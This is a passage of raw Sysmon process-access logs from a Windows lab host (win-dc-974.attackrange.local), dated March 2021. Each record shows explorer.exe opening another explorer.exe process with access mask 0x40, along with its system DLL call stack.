16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 